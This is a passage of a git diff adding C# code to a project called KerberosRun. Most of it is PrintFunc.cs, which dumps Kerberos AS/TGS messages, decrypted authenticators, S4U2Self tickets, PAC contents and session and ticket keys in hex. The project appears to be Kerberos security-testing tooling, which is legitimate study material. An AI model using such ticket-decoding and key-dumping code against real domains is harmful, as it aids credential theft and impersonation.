+                new KrbAuthorizationData
+                {
+                    Type = AuthorizationDataType.AdIfRelevant,
+                    Data = sequence.Encode()
+                });
+
+
+            return authz.ToArray();
+
+        }
+
+
+
+
+
+    }
+}
\ No newline at end of file
diff --git a/KerberosRun/KerberosRun/PrintFunc.cs b/KerberosRun/KerberosRun/PrintFunc.cs
new file mode 100644
index 0000000..3bd6d7c
--- /dev/null
+++ b/KerberosRun/KerberosRun/PrintFunc.cs
@@ -0,0 +1,844 @@
+using System;
+using Kerberos.NET.Crypto;
+using Kerberos.NET.Entities;
+using System.Linq;
+using System.Text.RegularExpressions;
+
+namespace KerberosRun
+{
+    class PrintFunc
+    {
+
+
+        public static void PrintBanner()
+        {
+            Console.WriteLine();
+            Console.WriteLine(@"   __           __              ");
+            Console.WriteLine(@"  / /_____ ____/ /  ___ _______  ___ ______ _____ ");
+            Console.WriteLine(@" /  '_/ -_) __/ _ \/ -_) __/ _ \(_-</ __/ // / _ \");
+            Console.WriteLine(@"/_/\_\\__/_/ /_.__/\__/_/  \___/___/_/  \_,_/_//_/");
+            Console.WriteLine();
+            Console.WriteLine("  v1.0.0");
+        }
+        //PaData
+        public static void PrintPaData(KrbPaData[] paData, KerberosKey key, string decrypted = "", KerberosKey sessionKey = null)
+        {
+            if (paData != null)
+            {
+                foreach (var data in paData)
+                {
+                    if (data.Type == PaDataType.PA_SUPPORTED_ETYPES)
+                    {
+                        var etypes = paData.FirstOrDefault(p => p.Type == PaDataType.PA_SUPPORTED_ETYPES);
+                        //var encryptedEtypes = KrbETypeList.Decode(etypes.Value);
+
+                        Console.WriteLine("{0}       - {1} :", decrypted, etypes.Type);
+                        Console.WriteLine("{0}          - Value : {1}", decrypted, (BitConverter.ToString(etypes.Value.ToArray())).Replace("-", ""));
+                    }
+                    else if (data.Type == PaDataType.PA_ENC_TIMESTAMP)
+                    {
+                        var timestampPaData = paData.FirstOrDefault(p => p.Type == PaDataType.PA_ENC_TIMESTAMP);
+                        var encryptedTimestamp = KrbEncryptedData.Decode(timestampPaData.Value);
+
+                        Console.WriteLine("       - {0} : ", timestampPaData.Type);
+                        Console.WriteLine("          - EType :  {0}", encryptedTimestamp.EType);
+                        Console.WriteLine("          - kvno :  {0}", encryptedTimestamp.KeyVersionNumber);
+                        Console.WriteLine("          - Cipher :  [ClientEncryptedTimestamp...]");
+                        //Console.WriteLine("          - Cipher :  {0}", (BitConverter.ToString(encryptedTimestap.Cipher.ToArray())).Replace("-", ""));
+
+                        var timeStamp = encryptedTimestamp.Decrypt(key, KeyUsage.PaEncTs, d => KrbPaEncTsEnc.Decode(d));
+
+                        Console.WriteLine("          - PaTimestamp :  {0}", timeStamp.PaTimestamp);
+                        Console.WriteLine("          - PaUSec :  {0}", timeStamp.PaUSec);
+                    }
+                    else if (data.Type == PaDataType.PA_PAC_REQUEST)
+                    {
+                        var pacReq = paData.FirstOrDefault(p => p.Type == PaDataType.PA_PAC_REQUEST);
+                        var decodedPac = KrbPaPacRequest.Decode(pacReq.Value);
+
+                        Console.WriteLine("       - {0} :", pacReq.Type);
+                        Console.WriteLine("          - IncludePac :  {0}", decodedPac.IncludePac);
+                    }
+                    else if (data.Type == PaDataType.PA_PAC_OPTIONS)
+                    {
+                        var options = paData.FirstOrDefault(p => p.Type == PaDataType.PA_PAC_OPTIONS);
+                        var decodedOptions = KrbPaPacOptions.Decode(options.Value);
+
+                        Console.WriteLine("{0}       - {1} :", decrypted, options.Type);
+                        Console.WriteLine("{0}          - Flags :  {1}", decrypted, decodedOptions.Flags);
+                    }
+                    else if (data.Type == PaDataType.PA_ETYPE_INFO2)
+                    {
+                        var info2Enc = paData.FirstOrDefault(p => p.Type == PaDataType.PA_ETYPE_INFO2);
+                        var decodedInfo2 = info2Enc.DecodeETypeInfo2().FirstOrDefault();
+                        Console.WriteLine("       - {0} :", info2Enc.Type);
+                        Console.WriteLine("          - EType :  {0}", decodedInfo2.EType);
+                        Console.WriteLine("          - S2kParams :  {0}", decodedInfo2.S2kParams);
+                        Console.WriteLine("          - Salt :  {0}", decodedInfo2.Salt);
+                    }
+                    else if (data.Type == PaDataType.PA_FOR_USER)
+                    {
+                        var users = paData.FirstOrDefault(p => p.Type == PaDataType.PA_FOR_USER);
+                        var decodedUsers = KrbPaForUser.Decode(users.Value);
+
+                        Console.WriteLine("{0}       - {1} :", decrypted, users.Type);
+                        Console.WriteLine("{0}          - UserName :", decrypted);
+                        Console.WriteLine("{0}             - Type :  {1}", decrypted, decodedUsers.UserName.Type);
+                        Console.WriteLine("{0}             - Name :  {1}", decrypted, decodedUsers.UserName.Name[0]);
+                        Console.WriteLine("{0}          - UserRealm :  {1}", decrypted, decodedUsers.UserRealm);
+                        Console.WriteLine("{0}          - AuthPackage :  {1}", decrypted, decodedUsers.AuthPackage);
+                        Console.WriteLine("{0}          - Checksum :", decrypted);
+                        Console.WriteLine("{0}             - Type :  {1}", decrypted, decodedUsers.Checksum.Type);
+                        Console.WriteLine("{0}             - Checksum :  {1}", decrypted, (BitConverter.ToString(decodedUsers.Checksum.Checksum.ToArray())).Replace("-", ""));
+                    }
+                    else if (data.Type == PaDataType.PA_TGS_REQ)
+                    {
+                        var tgsreq = paData.FirstOrDefault(p => p.Type == PaDataType.PA_TGS_REQ);
+                        var apreq = tgsreq.DecodeApReq();
+                        Console.WriteLine("       - {0} :", tgsreq.Type);
+                        //Console.WriteLine("          - Value :  {0}", (BitConverter.ToString(tgsreq.Value.ToArray())).Replace("-", ""));
+                        Console.WriteLine("          - {0} :", apreq.MessageType);
+                        Console.WriteLine("             - pvno :  {0}", apreq.ProtocolVersionNumber);
+                        Console.WriteLine("             - ApOptions :  {0}", apreq.ApOptions);
+                        Console.WriteLine("             - Ticket :");
+                        Console.WriteLine("                - tkt-vno :  {0}", apreq.Ticket.TicketNumber);
+                        Console.WriteLine("                - Realm :  {0}", apreq.Ticket.Realm);
+                        Console.WriteLine("                - SName : ");
+                        Console.WriteLine("                   - Type :  {0}", apreq.Ticket.SName.Type);
+                        foreach (var name in apreq.Ticket.SName.Name)
+                        {
+                            Console.WriteLine("                   - Name :  {0}", name);
+                        }
+
+                        Console.WriteLine("                - EncryptedPart :");
+                        Console.WriteLine("                   - kvno :  {0}", apreq.Ticket.EncryptedPart.KeyVersionNumber);
+                        Console.WriteLine("                   - EType :  {0}", apreq.Ticket.EncryptedPart.EType);
+                        Console.WriteLine("                   - Cipher :  [krbtgtEncryptedCipher...]");
+                        //Console.WriteLine("                   - Cipher :  {0}", (BitConverter.ToString(apreq.Ticket.EncryptedPart.Cipher.ToArray())).Replace("-", ""));
+                        Console.WriteLine("             - Authenticator : ");
+                        Console.WriteLine("                - kvno :  {0}", apreq.Authenticator.KeyVersionNumber);
+                        Console.WriteLine("                - EType :  {0}", apreq.Authenticator.EType);
+                        //Console.WriteLine("                - Cipher :  {0}", apreq.Authenticator.Cipher);
+                        var authenticator = apreq.Authenticator.Decrypt(sessionKey,
+                            KeyUsage.PaTgsReqAuthenticator,
+                            d => KrbAuthenticator.DecodeApplication(d));
+
+                        Console.WriteLine("                - Realm :  {0}", authenticator.Realm);
+                        Console.WriteLine("                - SequenceNumber :  {0}", authenticator.SequenceNumber);
+                        Console.WriteLine("                - Subkey :");
+                        Console.WriteLine("                   - EType :  {0}", authenticator.Subkey.EType);
+                        Console.WriteLine("                   - KeyValue :  {0}", (BitConverter.ToString(authenticator.Subkey.KeyValue.ToArray())).Replace("-", ""));
+                        Console.WriteLine("                - CTime :  {0}", authenticator.CTime);
+                        Console.WriteLine("                - CuSec :  {0}", authenticator.CuSec);
+                        Console.WriteLine("                - CName :  ");
+                        Console.WriteLine("                   - Type :  {0}", authenticator.CName.Type);
+                        Console.WriteLine("                   - Name :  {0}", authenticator.CName.Name);
+                        Console.WriteLine("                - Checksum :");
+                        Console.WriteLine("                   - Type :  {0}", authenticator.Checksum.Type);
+                        Console.WriteLine("                   - Checksum :  {0}", (BitConverter.ToString(authenticator.Checksum.Checksum.ToArray())).Replace("-", ""));
+
+                        //if (authenticator.Checksum.Type == ChecksumType.KERB_CHECKSUM_HMAC_MD5)
+                        //{
+                        //    Console.WriteLine("======================================");
+                        //    Console.WriteLine("Testing... ");
+                        //    Console.WriteLine(authenticator.Checksum.DecodeDelegation().Flags);
+                        //    Console.WriteLine(authenticator.Checksum.DecodeDelegation().ChannelBinding);
+                        //    Console.WriteLine(authenticator.Checksum.DecodeDelegation().Extensions);
+                        //    Console.WriteLine(authenticator.Checksum.DecodeDelegation().DelegationOption);
+                        //    Console.WriteLine(authenticator.Checksum.DecodeDelegation().DelegationTicket);
+                        //    Console.WriteLine("======================================");
+                        //}
+
+
+                        Console.WriteLine("                - AuthorizationData :  {0}", authenticator.AuthorizationData);
+                        Console.WriteLine("                - AuthenticatorVersionNumber :  {0}", authenticator.AuthenticatorVersionNumber);
+                    }
+                    else
+                    {
+                        Console.WriteLine("[-] Unknown PaData Type: {0}", data.Type);
+                    }
+                }
+            }
+
+
+
+
+        }
+
+
+
+        //AS-REQ
+        public static void PrintReq(KrbAsReq reqMessage, KerberosKey key)
+        {
+            Console.WriteLine("    * MessageType :  {0}", reqMessage.MessageType);
+            Console.WriteLine("    * pvno :  {0}", reqMessage.ProtocolVersionNumber);
+            Console.WriteLine("    * PaData :");
+            PrintPaData(reqMessage.PaData, key);
+            Console.WriteLine("    * Body :");
+            Console.WriteLine("       - KdcOptions :  {0}", reqMessage.Body.KdcOptions);
+            Console.WriteLine("       - CName :");
+            Console.WriteLine("          - Type :  {0}", reqMessage.Body.CName.Type);
+            Console.WriteLine("          - Name :  {0}", reqMessage.Body.CName.Name);
+            Console.WriteLine("       - Realm :  {0}", reqMessage.Body.Realm);
+            Console.WriteLine("       - SName :");
+            Console.WriteLine("          - Type :  {0}", reqMessage.Body.SName.Type);
+            for (int i = 0; i < reqMessage.Body.SName.Name.Count(); i++)
+            {
+                Console.WriteLine("          - Name :  {0}", reqMessage.Body.SName.Name[i]);
+            }
+            Console.WriteLine("       - Till :  {0}", reqMessage.Body.Till);
+            Console.WriteLine("       - RTime :  {0}", reqMessage.Body.RTime);
+            Console.WriteLine("       - Nonce :  {0}", reqMessage.Body.Nonce);
+            Console.WriteLine("       - EType :");
+            for (int i = 0; i < reqMessage.Body.EType.Count(); i++)
+            {
+                Console.WriteLine("          - EncType :  {0}", reqMessage.Body.EType[i]);
+            }
+            Console.WriteLine("       - Addresses :");
+            Console.WriteLine("          - Type :  {0}", reqMessage.Body.Addresses[0].AddressType);
+            var addrhex = BitConverter.ToString(reqMessage.Body.Addresses[0].Address.ToArray());
+            var addr = string.Join("", Regex.Split(addrhex, "-").Select(x => (char)Convert.ToByte(x, 16)));
+            Console.WriteLine("          - Addresses :  {0}", addr);
+            Console.WriteLine("       - AdditionalTickets :  {0}", reqMessage.Body.AdditionalTickets);
+            Console.WriteLine("       - EncAuthorizationData :  {0}", reqMessage.Body.EncAuthorizationData);
+            Console.WriteLine("       - From :  {0}", reqMessage.Body.From);
+        }
+
+        //TGS-REQ
+        public static void PrintReq(KrbTgsReq reqMessage, KerberosKey key, KerberosKey sessionKey = null)
+        {
+            Console.WriteLine("    * MessageType :  {0}", reqMessage.MessageType);
+            Console.WriteLine("    * pvno :  {0}", reqMessage.ProtocolVersionNumber);
+            Console.WriteLine("    * PaData :");
+            PrintPaData(reqMessage.PaData, key, "", sessionKey);
+            Console.WriteLine("    * Body :");
+            Console.WriteLine("       - KdcOptions :  {0}", reqMessage.Body.KdcOptions);
+            //Console.WriteLine("       - CName :");
+            //Console.WriteLine("          - Type :  {0}", reqMessage.Body.CName.Type);
+            //Console.WriteLine("          - Name :  {0}", reqMessage.Body.CName.Name);
+            Console.WriteLine("       - Realm :  {0}", reqMessage.Body.Realm);
+            Console.WriteLine("       - SName :");
+            Console.WriteLine("          - Type :  {0}", reqMessage.Body.SName.Type);
+            for (int i = 0; i < reqMessage.Body.SName.Name.Count(); i++)
+            {
+                Console.WriteLine("          - Name :  {0}", reqMessage.Body.SName.Name[i]);
+            }
+            Console.WriteLine("       - Till :  {0}", reqMessage.Body.Till);
+            Console.WriteLine("       - RTime :  {0}", reqMessage.Body.RTime);
+            Console.WriteLine("       - Nonce :  {0}", reqMessage.Body.Nonce);
+            Console.WriteLine("       - EType :");
+            for (int i = 0; i < reqMessage.Body.EType.Count(); i++)
+            {
+                Console.WriteLine("          - EncType :  {0}", reqMessage.Body.EType[i]);
+            }
+            //Console.WriteLine("       - Addresses :");
+            //Console.WriteLine("          - Type :  {0}", reqMessage.Body.Addresses);
+
+            Console.WriteLine("       - EncAuthorizationData :  {0}", reqMessage.Body.EncAuthorizationData);
+            Console.WriteLine("       - From :  {0}", reqMessage.Body.From);
+
+            Console.Write("       - AdditionalTickets : ");
+            if (reqMessage.Body.AdditionalTickets != null)
+            {
+                Console.WriteLine("(S4U2Self Ticket)");
+                foreach (var ticket in reqMessage.Body.AdditionalTickets)
+                {
+                    Console.WriteLine("          - tkt-vno :  {0}", ticket.TicketNumber);
+                    Console.WriteLine("          - Realm :  {0}", ticket.Realm);
+                    Console.WriteLine("          - SName : ");
+                    Console.WriteLine("             - Name :  {0}", ticket.SName.Name);
+                    Console.WriteLine("             - Type :  {0}", ticket.SName.Type);
+                    Console.WriteLine("          - EncryptedPart :");
+                    Console.WriteLine("             - kvno :  {0}", ticket.EncryptedPart.KeyVersionNumber);
+                    Console.WriteLine("             - EType :  {0}", ticket.EncryptedPart.EType);
+                    //Console.WriteLine("          - Cipher :  {0}", (BitConverter.ToString(asRep.Ticket.EncryptedPart.Cipher.ToArray())).Replace("-", ""));
+                    Console.WriteLine("             - Cipher :  [ServiceEncryptedCipher...]");
+                }
+            }
+            else
+            {
+                Console.WriteLine();
+            }
+
+
+        }
+
+
+        public static void PrintReq(KrbKdcReq reqMessage, KerberosKey key)
+        {
+            Console.WriteLine("    * MessageType :  {0}", reqMessage.MessageType);
+            Console.WriteLine("    * pvno :  {0}", reqMessage.ProtocolVersionNumber);
+            Console.WriteLine("    * PaData :");
+            PrintPaData(reqMessage.PaData, key);
+            Console.WriteLine("    * Body :");
+            Console.WriteLine("       - KdcOptions :  {0}", reqMessage.Body.KdcOptions);
+            //Console.WriteLine("       - Realm :  {0}", reqMessage.Body.Realm);
+            //Console.WriteLine("       - SName :");
+            //Console.WriteLine("          - Type :  {0}", reqMessage.Body.SName.Type);
+            //for (int i = 0; i < reqMessage.Body.SName.Name.Count(); i++)
+            //{
+            //    Console.WriteLine("          - Name :  {0}", reqMessage.Body.SName.Name[i]);
+            //}
+            //Console.WriteLine("       - Till :  {0}", reqMessage.Body.Till);
+            //Console.WriteLine("       - RTime :  {0}", reqMessage.Body.RTime);
+            //Console.WriteLine("       - Nonce :  {0}", reqMessage.Body.Nonce);
+            //Console.WriteLine("       - EType :  {0}", reqMessage.Body.Nonce);
+            //Console.WriteLine("       - EType :");
+            //for (int i = 0; i < reqMessage.Body.EType.Count(); i++)
+            //{
+            //    Console.WriteLine("          - EncType :  {0}", reqMessage.Body.EType[i]);
+            //}
+            ////Console.WriteLine("       - Addresses :");
+            ////Console.WriteLine("          - Type :  {0}", reqMessage.Body.Addresses);
+            //Console.WriteLine("       - AdditionalTickets :  {0}", reqMessage.Body.AdditionalTickets);
+            //Console.WriteLine("       - EncAuthorizationData :  {0}", reqMessage.Body.EncAuthorizationData);
+        }
+
+
+
+        //AS-REP
+        public static void PrintRep(KrbAsRep asRep, KerberosKey key)
+        {
+            Console.WriteLine("    * MessageType :  {0}", asRep.MessageType);
+            Console.WriteLine("    * pvno :  {0}", asRep.ProtocolVersionNumber);
+            Console.WriteLine("    * PaData :");
+            PrintPaData(asRep.PaData, key);
+
+
+            Console.WriteLine("    * CRealm :  {0}", asRep.CRealm);
+            Console.WriteLine("    * CName : ");
+            Console.WriteLine("       - Type :  {0}", asRep.CName.Type);
+            Console.WriteLine("       - Name :  {0}", asRep.CName.Name);
+            Console.WriteLine("    * Ticket :");
+            Console.WriteLine("       - tkt-vno :  {0}", asRep.Ticket.TicketNumber);
+            Console.WriteLine("       - Realm :  {0}", asRep.Ticket.Realm);
+            Console.WriteLine("       - SName : ");
+            Console.WriteLine("          - Name :  {0}", asRep.Ticket.SName.Name);
+            Console.WriteLine("          - Type :  {0}", asRep.Ticket.SName.Type);
+            Console.WriteLine("       - EncryptedPart :");
+            Console.WriteLine("          - kvno :  {0}", asRep.Ticket.EncryptedPart.KeyVersionNumber);
+            Console.WriteLine("          - EType :  {0}", asRep.Ticket.EncryptedPart.EType);
+            //Console.WriteLine("          - Cipher :  {0}", (BitConverter.ToString(asRep.Ticket.EncryptedPart.Cipher.ToArray())).Replace("-", ""));
+            Console.WriteLine("          - Cipher :  [krbtgtEncryptedCipher...]");
+            Console.WriteLine("    * Enc-Part :");
+            Console.WriteLine("       - kvno :  {0}", asRep.EncPart.KeyVersionNumber);
+            Console.WriteLine("       - EType :  {0}", asRep.EncPart.EType);
+            //Console.WriteLine("       - Cipher :  {0}", (BitConverter.ToString(asRep.EncPart.Cipher.ToArray())).Replace("-", ""));
+            Console.WriteLine("       - Cipher :  [ClientEncryptedCipher...]");
+        }
+
+        //TGS-REP
+        public static void PrintRep(KrbTgsRep tgsRep, KerberosKey key)
+        {
+            Console.WriteLine("    * MessageType :  {0}", tgsRep.MessageType);
+            Console.WriteLine("    * pvno :  {0}", tgsRep.ProtocolVersionNumber);
+            Console.WriteLine("    * PaData :");
+            PrintPaData(tgsRep.PaData, key);
+            Console.WriteLine("    * CRealm :  {0}", tgsRep.CRealm);
+            Console.WriteLine("    * CName :");
+            Console.WriteLine("       - Type :  {0}", tgsRep.CName.Type);
+            Console.WriteLine("       - Name :  {0}", tgsRep.CName.Name);
+            Console.WriteLine("    * Ticket :");
+            Console.WriteLine("       - tkt-vno :  {0}", tgsRep.Ticket.TicketNumber);
+            Console.WriteLine("       - Realm :  {0}", tgsRep.Ticket.Realm);
+            Console.WriteLine("       - SName : ");
+            Console.WriteLine("          - Name :  {0}", tgsRep.Ticket.SName.Name);
+            Console.WriteLine("          - Type :  {0}", tgsRep.Ticket.SName.Type);
+            Console.WriteLine("       - EncryptedPart :");
+            Console.WriteLine("          - kvno :  {0}", tgsRep.Ticket.EncryptedPart.KeyVersionNumber);
+            Console.WriteLine("          - EType :  {0}", tgsRep.Ticket.EncryptedPart.EType);
+            if (tgsRep.Ticket.SName.Name[0] == "krbtgt")
+            {
+                Console.WriteLine("          - Cipher :  [krbtgtEncryptedCipher...]");
+            }
+            else
+            {
+                Console.WriteLine("          - Cipher :  [ServiceEncryptedCipher...]");
+            }
+
+            //Console.WriteLine("          - Cipher :  {0}", (BitConverter.ToString(tgsRep.Ticket.EncryptedPart.Cipher.ToArray())).Replace("-", ""));
+            Console.WriteLine("    * Enc-Part :");
+            Console.WriteLine("       - EType :  {0}", tgsRep.EncPart.EType);
+            Console.WriteLine("       - kvno :  {0}", tgsRep.EncPart.KeyVersionNumber);
+            //Console.WriteLine("       - Cipher :  {0}", (BitConverter.ToString(tgsRep.EncPart.Cipher.ToArray())).Replace("-", ""));
+            Console.WriteLine("       - Cipher :  [SubSessionKeyEncryptedCipher..]");
+        }
+
+        //AS-REP ENC-PART
+        public static void PrintRepEnc(KrbEncAsRepPart repMessage, KerberosKey key)
+        {
+            Console.WriteLine("       - AuthTime :  {0}", repMessage.AuthTime);
+            Console.WriteLine("       - StartTime :  {0}", repMessage.StartTime);
+            Console.WriteLine("       - EndTime :  {0}", repMessage.EndTime);
+            Console.WriteLine("       - RenewTill :  {0}", repMessage.RenewTill);
+            Console.WriteLine("       - Nonce :  {0}", repMessage.Nonce);
+            Console.WriteLine("       - Realm :  {0}", repMessage.Realm);
+            Console.WriteLine("       - SName :");
+            Console.WriteLine("          - Type :  {0}", repMessage.SName.Type);
+            for (int i = 0; i < repMessage.SName.Name.Count(); i++)
+            {
+                Console.WriteLine("          - Name :  {0}", repMessage.SName.Name[i]);
+            }
+            Console.WriteLine("       - EncryptedPaData :");
+            PrintPaData(repMessage.EncryptedPaData.MethodData, key, "   ", null);
+            Console.WriteLine("       - Key :");
+            Console.WriteLine("          - EType :  {0}", repMessage.Key.EType);
+            Console.WriteLine("          - Value :  {0}", (BitConverter.ToString(repMessage.Key.KeyValue.ToArray())).Replace("-", ""));
+            Console.WriteLine("       - KeyExpiration :  {0}", repMessage.KeyExpiration);
+            Console.WriteLine("       - CAddr :");
+            Console.WriteLine("          - Type :  {0}", repMessage.CAddr[0].AddressType);
+            var addrhex = BitConverter.ToString(repMessage.CAddr[0].Address.ToArray());
+            var addr = string.Join("", Regex.Split(addrhex, "-").Select(x => (char)Convert.ToByte(x, 16)));
+            Console.WriteLine("          - Addresses :  {0}", addr);
+            Console.WriteLine("       - Flags :  {0}", repMessage.Flags);
+            Console.WriteLine("       - LastReq ");
+            Console.WriteLine("          - Type :  {0}", repMessage.LastReq.FirstOrDefault().Type);
+            Console.WriteLine("          - Type :  {0}", repMessage.LastReq.FirstOrDefault().Value);
+
+        }
+
+        //TGS-REP ENC-PART
+        public static void PrintRepEnc(KrbEncTgsRepPart repMessage, KerberosKey key)
+        {
+            Console.WriteLine("       - AuthTime :  {0}", repMessage.AuthTime);
+            Console.WriteLine("       - StartTime :  {0}", repMessage.StartTime);
+            Console.WriteLine("       - EndTime :  {0}", repMessage.EndTime);
+            Console.WriteLine("       - RenewTill :  {0}", repMessage.RenewTill);
+            Console.WriteLine("       - Nonce :  {0}", repMessage.Nonce);
+            Console.WriteLine("       - Realm :  {0}", repMessage.Realm);
+            Console.WriteLine("       - SName :");
+            Console.WriteLine("          - Type :  {0}", repMessage.SName.Type);
+            for (int i = 0; i < repMessage.SName.Name.Count(); i++)
+            {
+                Console.WriteLine("          - Name :  {0}", repMessage.SName.Name[i]);
+            }
+            Console.WriteLine("       - EncryptedPaData :");
+            if (repMessage.EncryptedPaData != null)
+            {
+                PrintPaData(repMessage.EncryptedPaData.MethodData, key, "   ");
+            }
+            Console.WriteLine("       - Key :");
+            Console.WriteLine("          - EType :  {0}", repMessage.Key.EType);
+            Console.WriteLine("          - Value :  {0}", (BitConverter.ToString(repMessage.Key.KeyValue.ToArray())).Replace("-", ""));
+            Console.WriteLine("       - KeyExpiration :  {0}", repMessage.KeyExpiration);
+            //Console.WriteLine("       - CAddr :  {0}", repMessage.CAddr);
+            //Console.WriteLine("          - Type :  {0}", repMessage.CAddr[0].AddressType);
+            //var addrhex = BitConverter.ToString(repMessage.CAddr[0].Address.ToArray());
+            //var addr = string.Join("", Regex.Split(addrhex, "-").Select(x => (char)Convert.ToByte(x, 16)));
+            //Console.WriteLine("          - Addresses :  {0}", addr);
+            Console.WriteLine("       - Flags :  {0}", repMessage.Flags);
+            Console.WriteLine("       - LastReq ");
+            Console.WriteLine("          - Type :  {0}", repMessage.LastReq.FirstOrDefault().Type);
+            Console.WriteLine("          - Type :  {0}", repMessage.LastReq.FirstOrDefault().Value);
+
+        }
+
+        //TICKET ENC-PART
+        public static void PrintTicketEnc(KrbEncTicketPart ticketEnc)
+        {
+            Console.WriteLine("       - AuthTime :  {0}", ticketEnc.AuthTime);
+            Console.WriteLine("       - StartTime :  {0}", ticketEnc.StartTime);
+            Console.WriteLine("       - EndTime :  {0}", ticketEnc.EndTime);
+            Console.WriteLine("       - RenewTill :  {0}", ticketEnc.RenewTill);
+            Console.WriteLine("       - CRealm :  {0}", ticketEnc.CRealm);
+            Console.WriteLine("       - CName :");
+            Console.WriteLine("          - Type :  {0}", ticketEnc.CName.Type);
+            Console.WriteLine("          - Name :  {0}", ticketEnc.CName.Name);
+            Console.WriteLine("       - AuthorizationData :");
+
+            if (ticketEnc.AuthorizationData != null)
+            {
+                foreach (var data in ticketEnc.AuthorizationData)
+                {
+                    if (data.Type == AuthorizationDataType.AdIfRelevant)
+                    {
+                        Console.WriteLine("          - Type :  {0}", ticketEnc.AuthorizationData.FirstOrDefault().Type);
+
+                        var decodedData = data.DecodeAdIfRelevant();
+
+                        foreach (var data2 in decodedData)
+                        {
+                            if (data2.Type == AuthorizationDataType.AdWin2kPac)
+                            {
+                                Console.WriteLine("             - Type :  {0}", data2.Type);
+                                PrintPAC(data2);
+                            }
+                            else
+                            {
+                                Console.WriteLine("[-] Unknown AdIfRelevant Data Type :  {0}", data2.Type);
+                            }
+                        }
+                    }
+                    else
+                    {
+                        Console.WriteLine("[-] Unknown Authorization Data sType :  {0}", data.Type);
+                    }
+                }
+            }
+            //CAddr Temp
+            string caddr = null;
+            if (ticketEnc.CAddr != null)
+            {
+                caddr = ticketEnc.CAddr.ToString();
+            }
+            Console.WriteLine("       - CAddr :  {0}", caddr);
+            Console.WriteLine("       - Flags :  {0}", ticketEnc.Flags);
+            Console.WriteLine("       - Key :");
+            Console.WriteLine("          - EType :  {0}", ticketEnc.Key.EType);
+            Console.WriteLine("          - Value :  {0}", (BitConverter.ToString(ticketEnc.Key.KeyValue.ToArray())).Replace("-", ""));
+            Console.WriteLine("       - Transited :");
+            Console.WriteLine("          - Type :  {0}", ticketEnc.Transited.Type);
+            Console.WriteLine("          - Contents :  {0}", BitConverter.ToString(ticketEnc.Transited.Contents.ToArray()));
+        }
+
+
+        public static void PrintPAC(KrbAuthorizationData authData)
+        {
+            var pac = new PrivilegedAttributeCertificate(authData);
+            //Type
+            Console.WriteLine("                - Type :  {0}", pac.Type);
+            //Version
+            Console.WriteLine("                - Version :  {0}", pac.Version);
+
+            //LogonInfo
+            if (pac.LogonInfo != null)
+            {
+                Console.WriteLine("                - LogonInfo :  ");
+                Console.WriteLine("                   - PacType :  ", pac.LogonInfo.PacType);
+                Console.WriteLine("                   - DomainId :  ");
+                if (pac.LogonInfo.DomainId != null) 
+                {
+                    Console.WriteLine("                      - Revision :  {0}", pac.LogonInfo.DomainId.Revision);
+                    Console.WriteLine("                      - IdentifierAuthority :  {0}", pac.LogonInfo.DomainId.IdentifierAuthority.Authority);
+                    Console.WriteLine("                      - SubAuthority :  {0}", String.Join(", ", pac.LogonInfo.DomainId.SubAuthority.ToArray()));
+                    Console.WriteLine("                      - SubAuthorityCount :  {0}", pac.LogonInfo.DomainId.SubAuthorityCount);
+                }
+                Console.WriteLine("                   - ExtraIds :  ");
+                if (pac.LogonInfo.ExtraIds != null)
+                {
+                    foreach (var extraId in pac.LogonInfo.ExtraIds.ToArray())
+                    {
+                        Console.WriteLine("                      - Attributes :  {0}", extraId.Attributes);
+                        Console.WriteLine("                      - Sid :  {0}", extraId.Sid);
+                        Console.WriteLine("                      - Revision :  {0}", extraId.Sid.Revision);
+                        Console.WriteLine("                      - IdentifierAuthority :  {0}", extraId.Sid.IdentifierAuthority.Authority);
+                        //Console.WriteLine("                      - IdentifierAuthority :  {0}", BitConverter.ToString(extraId.Sid.IdentifierAuthority.IdentifierAuthority.ToArray()));
+                        Console.WriteLine("                      - SubAuthority :  {0}", String.Join(", ", extraId.Sid.SubAuthority.ToArray()));
+                        Console.WriteLine("                      - SubAuthorityCount :  {0}", extraId.Sid.SubAuthorityCount);
+                    }
+                }
+               
+                
+                Console.WriteLine("                   - DomainSid :  ");
+                Console.WriteLine("                      - Attributes :  {0}", pac.LogonInfo.DomainSid.Attributes);
+                Console.WriteLine("                      - Id :  {0}", pac.LogonInfo.DomainSid.Id);
+                Console.WriteLine("                      - Value :  {0}", pac.LogonInfo.DomainSid.Value);
+                Console.WriteLine("                   - ExtraSidCount :  {0}", pac.LogonInfo.ExtraSidCount);
+                Console.WriteLine("                   - ExtraSids :  ");
+                if (pac.LogonInfo.ExtraSids != null)
+                {
+                    foreach (var extraSid in pac.LogonInfo.ExtraSids.ToArray())
+                    {
+                        Console.WriteLine("                      - Id :  {0}", extraSid.Id);
+                        Console.WriteLine("                      - Attributes :  {0}", extraSid.Attributes);
+                        Console.WriteLine("                      - Value :  {0}", extraSid.Value);
+                    }
+                }
+                
+
+                Console.WriteLine("                   - GroupCount :  {0}", pac.LogonInfo.GroupCount);
+                Console.WriteLine("                   - GroupId :  {0}", pac.LogonInfo.GroupId);
+                Console.WriteLine("                   - GroupIds :  ");
+                if (pac.LogonInfo.GroupIds != null)
+                {
+                    foreach (var groupId in pac.LogonInfo.GroupIds)
+                    {
+                        Console.WriteLine("                      - RelativeId :  {0}", groupId.RelativeId);
+                        Console.WriteLine("                      - Attributes :  {0}", groupId.Attributes);
+                    }
+                }
+                
+                
+                Console.WriteLine("                   - GroupSid :  {0}", pac.LogonInfo.GroupSid);
+                Console.WriteLine("                   - GroupSids :  ");
+                if (pac.LogonInfo.GroupSids != null)
+                {
+                    foreach (var groupSid in pac.LogonInfo.GroupSids)
+                    {
+                        Console.WriteLine("                      - Id :  {0}", groupSid.Id);
+                        Console.WriteLine("                      - Attributes :  {0}", groupSid.Attributes);
+                        Console.WriteLine("                      - Value :  {0}", groupSid.Value);
+                    }
+                }
+                
+                
+                Console.WriteLine("                   - HomeDirectory :  {0}", pac.LogonInfo.HomeDirectory);
+                Console.WriteLine("                   - HomeDrive :  {0}", pac.LogonInfo.HomeDrive);
+                Console.WriteLine("                   - KickOffTime :  {0}", pac.LogonInfo.KickOffTime);
+                Console.WriteLine("                   - LastFailedILogon :  {0}", pac.LogonInfo.LastFailedILogon);
+                Console.WriteLine("                   - LastSuccessfulILogon :  {0}", pac.LogonInfo.LastSuccessfulILogon);
+                Console.WriteLine("                   - LogoffTime :  {0}", pac.LogonInfo.LogoffTime);
+                Console.WriteLine("                   - LogonCount :  {0}", pac.LogonInfo.LogonCount);
+                Console.WriteLine("                   - LogonScript :  {0}", pac.LogonInfo.LogonScript);
+                Console.WriteLine("                   - LogonTime :  {0}", pac.LogonInfo.LogonTime);
